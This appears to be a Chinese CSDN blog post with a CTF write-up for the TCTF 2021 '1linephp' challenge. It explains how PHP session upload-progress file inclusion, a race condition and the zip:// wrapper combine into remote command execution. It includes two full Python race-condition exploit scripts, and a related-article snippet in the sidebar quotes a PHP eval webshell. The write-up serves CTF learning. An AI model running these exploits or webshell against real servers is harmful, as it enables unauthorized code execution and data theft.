TCTF 1linephp

最新推荐文章于 2021-10-13 17:14:21 发布
最新推荐文章于 2021-10-13 17:14:21 发布
阅读量560 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: java c语言 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45805993/article/details/118573229
版权

0x00. 参考文档
https://gist.github.com/as3617/50d598ede736d81bc57804e4d19700e5#file-s-zip-hexcode
https://github.com/waderwu/My-CTF-Challenges/blob/master/0ctf-2021/1linephp/writeup/1linephp_writeup_en.md
有点像defcon-2018 one_line_php

0x01.源码及原理

<?php
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');

phpinfo中
在这里插入图片描述session.upload_progress.enable on
可以利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含
session.upload_progress.cleanup会自动清理session,需要条件竞争
https://www.freebuf.com/vuls/202819.html
在这里插入图片描述session.use_strict_mode值为0时。此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=TGAO,PHP将会在服务器上创建一个文件:/tmp/sess_TGAO”。(也可能在/var/lib/php目录下)即使此时用户没有初始化Session,PHP也会自动初始化Session。 并产生一个键值,这个键值有ini.get(“session.upload_progress.prefix”)+由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。
所以可以通过上传一个很大的文件来进行条件竞争,同时post PHP_SESSION_UPLOAD_PROGRESS=webshell然后连接

0x02.具体解题步骤
源码非常简单,get传入参数后会拼接.php,然后包含该文件,试了data协议和phar协议,都不太能用,后来发现使用zip伪协议很方便
例如构造zip://tmp/sess_xxxx#1.php可以直接读到1.zip打包中的1.php文件
这里需要将zip的内容通过PHP_SESSION_UPLOAD_PROGRESS传进session的临时文件中,然后通过条件竞争利用zip伪协议访问该sess_xxxx#shell并传入命令执行的参数

非预期:
zip的前16个字节(upload_progress_⻓度为16)对php读zip没影响,删掉(改为00)然后竞争即可
在这里插入图片描述

预期:
在这里插入图片描述已知php使用libzip解析zip包,此时对zip包的开头没有一定的要求,可以在前面插入数据,更改offset位,使zip被正常解析

0X03脚本
by Nu1L

import requests
import threading
host = 'http://111.186.59.2:50082'
PHPSESSID = 'qiyou'
def creatSession():
    while True:
        files = {
            "upload" : ("tmp.jpg", open("./1.jpg", "rb"))
        }
        data = {"PHP_SESSION_UPLOAD_PROGRESS" : open("./s.zip", "rb").read() }
        headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
        r = requests.post(host,files = files,headers = headers,data=data)
fileName ='zip:///tmp/sess_qiyou%23s&a=system&b=cat%20/dd810fc36330c200a_flag/flag'
if __name__ == '__main__':
    url = "{}/index.php?yxxx={}".format(host,fileName)
    headers = {'Cookie':'PHPSESSID=' + PHPSESSID}
    t = threading.Thread(target=creatSession,args=())
    t.setDaemon(True)
    t.start()
    while True:
        res = requests.get(url,headers=headers)

        print(res.content)

by as3617

import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool

HOST = "http://111.186.59.2:50082/"

headers = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=12'
}
payload = open('./s.zip', 'rb').read()


def runner1(i):
    url = "http://111.186.59.2:50082/"
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload
    }
    while 1:
        fp = open('1.jpg', 'rb')
        r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
        fp.close()


def runner2(i):
    filename = '/tmp/sess_12%23s&a=system&b=cat%20/dd810fc36330c200a_flag/flag'
    filename = f'zip://%s' % filename
    # print filename
    while 1:
        url = '%s?yxxx=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.text
        if c and 'yxxx' not in c:
            print(c)


if sys.argv[1] == '1':
    runner = runner1
else:
    runner = runner2

pool = ThreadPool(32)
result = pool.map_async(runner, range(32)).get(0xffff)
ByNotD0g
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2018年“骇极杯” web3 GOOD JOB writeup 两种解法
a3320315的博客
10-17 747
0x01 贴出源码 <?php //error_reporting(0); //$dir=md5("icq" . $_SERVER['REMOTE_ADDR']); $dir=md5("icq"); $sandbox = '/var/sandbox/' . $dir; @mkdir($sandbox); @chdir($sandbox); ...
CTFHub技能书解题笔记-RCE-读取源代码
qq_43006864的博客
03-30 1546
打开题目,读取源代码。直接开整。 题目界面就是源代码。和上一道一样,但是代码有所变化。 if ( substr($_GET["file"], 0, 6) === "php://" ) #返回file里面第0个到第6个字符,且要等于 php:// 。 那既然要等于php://,就和上题一样,试试php://input 芜湖了,好像没用。这里的input是不起作用,看大佬说是allow_url_fopen没有开启。 题目要求又必须使用php://。而且flag就在/flag里。 这里引...
ctf中关于文件压缩的2个web题
南迪叶先森
07-19 779
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! 1sql注入总结 [CSCCTF 2019 Final]ZlipperyStillAlive 题目下载链接 https://github.com/sturmisch/cscctf-problem/tree/master/2019/final/web/zlippery-still-alive 这个题网上没有找到具体细节的wp,而且关于go的web题比较少,这里记录一下,看看题目 看看源码,发现有2个路由,get请求的根目录,和po.
0CTF/TCTF 2021 Quals_Misc_singer
Le1a's Blog
07-07 351
Misc singer 下载附件打开得到一个文本文件 从Csome-Official师傅的文章中得知,其文本内容除了=和,外,其他的是简谱音名 没写完 明天写
0ctf writeup
weixin_34384915的博客
03-08 1874
felixk3y · 2016/03/17 10:24Author:双螺旋安全研究院0x00 Rand_2(web)访问http://202.120.7.202:8888/,即可获取到题目的源码:#!php &lt;?php include('config.php'); session_start(); if($_SESSION['time'] &amp;&amp; time() - $_...
【技术分享】TCTF2021-1linephp 题解 .pdf
09-05
【技术分享】TCTF2021-1linephp 题解主要涉及Web安全领域的文件包含漏洞、ZIP协议利用以及PHP的session机制。这道题目要求参赛者利用有限制的任意文件包含漏洞,结合PHP环境中的ZIP扩展和session功能,实现远程代码...
0ctf_tctf_2018
05-16
0 CTF / TCTF 2018 0CTF / TCTF 2018决赛中的一些加密挑战
TCTF,0ops腾讯信息安全争霸赛.zip
最新发布
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
0ctf-tctf-2020:0CTFTCTF 2020质量解决方案
03-26
0ctf-tctf-2020:0CTFTCTF 2020质量解决方案
腾讯CTF(TCTF)大赛启动多方联动共建网络安全人才培养平台.pdf
09-20
腾讯CTF(TCTF)大赛启动多方联动共建网络安全人才培养平台.pdf
php7.0 ctf,从零基础到成功解题之0ctf-ezdoor
weixin_42584758的博客
03-20 152
这里要从wonderkun师傅的博客说起http://wonderkun.cc/index.html/?p=626wonderkun师傅已经在文章中做了详细的阐述其中php在文件路径处理上的底层关键代码函数tsrm_realpath()ci = len;// i的初始值为字符串的长度while (i > start && !IS_SLASH(path[i-1])) {i--;...
CTF one_Pointer_php 2021 蓝帽杯 WriteUp
baynk的博客
05-10 1222
两周前做的,弄了一会没时间就放下了,我当时以为我差一点,结果真的差亿点。。。 今天在BUUCTF中看到了这个题的复现,特来学习一波。 0x01 PHP审计 之前看到人家发的是张火炬,这次打开却是个广告了。。不过无所谓,给了源代码就成,分别是user.php和add_api.php。 ### user.php <?php class User{ public $count; } ?> ### add_api.php <?php include "user.php"; if($use
[0CTF 2016]piapiapia BUUCTF 详细writeup
叶子的Blog
10-13 469
基础知识 php反序列话逃逸原理 解题思路 payload /www.zip 源码泄露,直接可以下载 ​ 打开config.php可以看到可能flag就存放在这里 访问/register.php,随便注册一个账号,然后登陆,发现跳转到了update.php ​ ...
复现One-line-php-challenge
weixin_34346099的博客
12-10 489
https://www.anquanke.com/post/id/162656http://wonderkun.cc/index.html/?p=718 环境 ubuntu 18.04 php 7.2 PS:lsb_release -a //查看ubuntu的发行版本 题目 <?php ($_=@...
CTFhub php://input
qq_41497476的博客
07-27 3889
这一次相对于远程包含过滤了php://就不能直接利用 input 伪协议完成命令执行了 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?&g
__line__ php,hitcon 2018受虐笔记一:one-line-php-challenge 学习
weixin_29367131的博客
03-20 357
都是老知识,但是我依然不会做。。。。蓝瘦0x1 历史回顾任意文件包含漏洞,如果 session.upload_progress.enabled=On 开启,就可以包含session来getshell。这种思路在CTF中已经被利用了N多次了。在这里再回顾一下,加深一下印象。 手册上有一个例子,如下:一个上传进度数组的结构的例子" value="123" />在session中存放的数据看上去是...
----已搬运----[蓝帽杯 2021]One Pointer PHP --- PHP数组溢出,Fastcgi FTP - SSRF 攻击 php-fpm - SUID提权 proc
Zero_Adam的博客
06-11 589
二、学到的&&不足: 三、学习WP: 给了源码,两个PHP文件: user.php: <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $us
萌新之php一句话木马(上传漏洞)
热门推荐
weixin_45805993的博客
11-09 1万+
0x00参考文章 https://www.cnblogs.com/wangtanzhi/p/12243206.html https://xz.aliyun.com/t/2435 https://blog.csdn.net/momo_sleet/article/details/82497520 0x01 什么是一句话木马 <?php @eval($_POST['hacker']); ?> 如上就是一句一句话木马,eval函数可以使php将post进去的内容当做代码处理 如果网站在用户上传文件时没
Nacos JRaft Hessian 反序列化漏洞RCE深度剖析
这篇文档还提到了一些外部资源,如博客文章(<http://www.bmth666.cn/bmth_blog/2023/02/07/0CTF-TCTF-2022-hessian-onlyJdk>)和阿里云的安全通报(),它们可能提供了更具体的案例研究和解决方案建议。 总结来说,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值